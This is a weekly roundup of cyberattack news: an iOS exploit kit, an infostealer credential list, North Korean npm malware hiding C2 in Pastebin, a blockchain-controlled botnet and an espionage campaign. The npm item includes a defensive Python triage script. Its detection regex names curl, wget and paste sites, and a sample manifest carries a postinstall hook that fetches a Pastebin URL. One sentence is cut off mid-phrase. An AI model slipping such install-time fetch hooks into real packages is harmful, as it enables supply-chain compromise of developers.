Weekly Summary of Cyberattacks, 26 Feb to 4 March
Coruna: The Mysterious Journey of a Powerful iOS Exploit Kit
Researchers from Google Threat Intelligence Group (GTIG) disclosed the discovery of Coruna, a sophisticated iOS exploit kit targeting Apple iPhones running iOS versions 13.0 through 17.2.1. The exploit kit contains five complete iOS exploit chains and a total of 23 exploits, making it one of the most comprehensive collections of iOS exploitation techniques observed in the wild. Some of the exploits rely on non-public exploitation techniques and mitigation bypasses, highlighting a high level of technical sophistication. The exploit chain was delivered through a previously unseen JavaScript exploitation framework that used obfuscation techniques to encode strings and integers.
Infostealer list of 8.29 million credentials linked to websites, including more than 194,000 French accounts
Researchers monitoring cybercrime activity have identified a massive collection of stolen login credentials compiled from infostealer malware infections, totaling approximately 8.29 million username-password pairs. The dataset links each credential directly to the corresponding login portal, giving automated credential-stuffing tools a ready-to-use blueprint for targeting specific web services. The snapshot shows a significant concentration of French internet accounts: over 194,000 .fr-domain credentials are included, dwarfing other regional domains such as .ca, .be, .ch, and .lu.
North Korean Hackers Publish 26 npm Packages Hiding Pastebin C2 for Cross-Platform RAT
Security researchers revealed that threat actors linked to North Korea published 26 malicious packages to the npm registry as part of an ongoing supply chain campaign. The packages were disguised as legitimate developer utilities, increasing the likelihood that unsuspecting developers would download and integrate them into projects. This activity has been associated with the broader “Contagious Interview” campaign, which previously targeted developers through social engineering and malicious coding assignments. The malicious packages execute during installation and initiate contact with Pastebin to retrieve hidden command-and-control (C2) infrastructure. Instead of directly embedding malicious domains, the attackers used steganography techniques to conceal C2 addresses within seemingly benign Pastebin content. Once decoded, the malware downloads additional payloads tailored to the victim’s operating system, enabling cross-platform functionality.
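As an added illustration of the install-time hook abuse described above (my example, not code from the researchers' report or the npm project): a small Python triage script that flags npm manifests whose install lifecycle scripts reference paste sites or download primitives. The package names, version numbers and the `EXAMPLE_ID` paste path are constructed, and the keyword list is a heuristic for triage, not proof of malice.

```python
"""Triage npm package manifests for install-time lifecycle scripts that
reach out to paste sites such as Pastebin (constructed, defender-side example)."""
import re

# Lifecycle hooks npm runs automatically when a dependency is installed.
INSTALL_HOOKS = ("preinstall", "install", "postinstall")

# Paste/dead-drop hosts and download primitives worth a second look.
SUSPICIOUS = re.compile(
    r"pastebin\.com|curl\s|wget\s|https?://|Invoke-WebRequest|node\s+-e",
    re.IGNORECASE,
)


def audit_manifest(manifest: dict) -> list[dict]:
    """Return one finding per install-time script that matches SUSPICIOUS."""
    findings = []
    scripts = manifest.get("scripts", {})
    for hook in INSTALL_HOOKS:
        cmd = scripts.get(hook)
        if cmd and SUSPICIOUS.search(cmd):
            findings.append({"package": manifest.get("name", "<unnamed>"),
                             "hook": hook, "script": cmd})
    return findings


def audit_all(manifests: list[dict]) -> list[dict]:
    """Run audit_manifest over every manifest and flatten the findings."""
    findings = []
    for m in manifests:
        findings.extend(audit_manifest(m))
    return findings


# Constructed manifests: one benign, one modelling the Pastebin dead-drop pattern.
BENIGN = {"name": "string-pad-utils", "version": "1.0.0",
          "scripts": {"test": "jest", "build": "tsc -p ."}}
SUSPECT = {"name": "dev-helper-toolkit", "version": "0.1.3",
           "scripts": {"test": "mocha",
                       "postinstall": "node -e \"require('https').get("
                                      "'https://pastebin.com/raw/EXAMPLE_ID',"
                                      "r=>r.pipe(process.stdout))\""}}

if __name__ == "__main__":
    for f in audit_all([BENIGN, SUSPECT]):
        print(f"[!] {f['package']}: {f['hook']} -> {f['script']}")
```

In practice this would run over the `package.json` of every resolved dependency in `node_modules` before the install scripts are allowed to execute (for example with `npm install --ignore-scripts` first).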
Aeternum Botnet Shifts Command Control to Polygon Blockchain
Cybersecurity researchers describe the Aeternum C2 botnet loader, a novel piece of malware that uses the Polygon public blockchain as its primary command-and-control (C2) infrastructure. This approach represents a departure from conventional botnet architectures that rely on static command servers, domains, or centralized infrastructure. Instead, Aeternum operators publish encrypted instructions directly to smart contracts on the Polygon chain, which infected hosts then poll via standard remote procedure call (RPC) endpoints to retrieve commands. This effectively makes the botnet’s C2 layer immutable and highly resistant to traditional takedown efforts, as historical blockchain transactions cannot be altered or removed by law enforcement or defenders.
GRIDTIDE: Global Cyber Espionage Campaign
Google Threat Intelligence Group (GTIG), in collaboration with Mandiant and other industry partners, publicly disclosed and acted to disrupt a global cyber espionage campaign attributed to a threat actor tracked as UNC2814. This long-running operation, known internally as GRIDTIDE, targeted telecommunications providers and government organizations in at least 42. While the campaign exploited no specific product vulnerability, it exhibited a high degree of stealth by abusing legitimate cloud infrastructure and SaaS APIs for command-and-control (C2), allowing malicious traffic to blend with normal enterprise workflows and evade traditional detection.